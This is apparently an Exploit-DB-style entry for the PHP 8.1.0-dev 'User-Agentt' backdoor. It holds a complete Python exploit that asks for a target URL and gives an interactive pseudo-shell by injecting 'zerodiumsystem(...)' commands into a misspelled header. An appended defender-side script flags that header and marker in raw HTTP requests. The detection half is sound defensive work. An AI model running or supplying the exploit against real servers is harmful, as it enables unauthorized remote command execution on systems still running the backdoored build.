# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 May 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
#     - https://hub.docker.com/r/phpdaily/php
#     - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
#     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
#     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, version 8.1.0-dev, was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.
"""

#!/usr/bin/env python3
import sys

import requests

host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)

if response.status_code == 200:
    print("\nInteractive shell is opened on", host, "\nCan't access tty; job control turned off.")
    try:
        while True:
            cmd = input("$ ")
            # The command is wrapped in system() and sent in the misspelled User-Agentt header
            headers = {
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                "User-Agentt": "zerodiumsystem('" + cmd + "');"
            }
            response = request.get(host, headers=headers, allow_redirects=False)
            current_page = response.text
            # Command output is emitted before the page's HTML, so keep only that part
            stdout = current_page.split('<!DOCTYPE html>', 1)
            print(stdout[0])
    except KeyboardInterrupt:
        print("Exiting...")
        sys.exit()
else:
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    sys.exit()
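
A defender-side check for the trigger described above, added here as an example and not part of the original exploit file: it parses raw HTTP/1.x requests (for instance from a proxy or packet capture) and flags any `User-Agentt` header, escalating when the value contains the `zerodium` marker the script sends. The function names, the case-insensitive substring match, the `app.example` host and the sample requests are assumptions constructed for illustration.

```python
import re

BACKDOOR_HEADER = "user-agentt"  # header name from the page (doubled "t")
TRIGGER_MARKER = "zerodium"      # marker that opens the page's payload value


def parse_headers(raw_request):
    """Return (name, value) pairs from the header block of a raw HTTP/1.x request."""
    head = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)[0]  # drop the body
    headers = []
    for line in re.split(r"\r?\n", head)[1:]:    # [1:] skips the request line
        if line[:1] in (" ", "\t") and headers:  # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, (value + " " + line.strip()).strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return headers


def classify(raw_request):
    """'trigger': header carries the marker; 'suspicious': header present; else 'clean'."""
    verdict = "clean"
    for name, value in parse_headers(raw_request):
        if name.lower() != BACKDOOR_HEADER:
            continue
        if TRIGGER_MARKER in value.lower():
            return "trigger"
        verdict = "suspicious"  # misspelled name that standard clients do not send
    return verdict


# Constructed sample requests (not captured traffic).
BASE = "GET / HTTP/1.1\r\nHost: app.example\r\n"
SAMPLES = {
    "normal": BASE + "User-Agent: Mozilla/5.0\r\n\r\n",
    "probe": BASE + "user-agentt: test\r\n\r\n",
    "exploit": BASE + "User-Agentt: zerodiumsystem('id');\r\n\r\n",
    "folded": BASE + "User-Agentt:\r\n zerodiumsystem('id');\r\n\r\n",
    "body_only": BASE + "\r\nUser-Agentt: zerodiumsystem('id');",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:10} -> {classify(raw)}")
```

Matching on the header name alone already separates the probe from normal traffic; the body-only sample stays clean because only the header block is inspected.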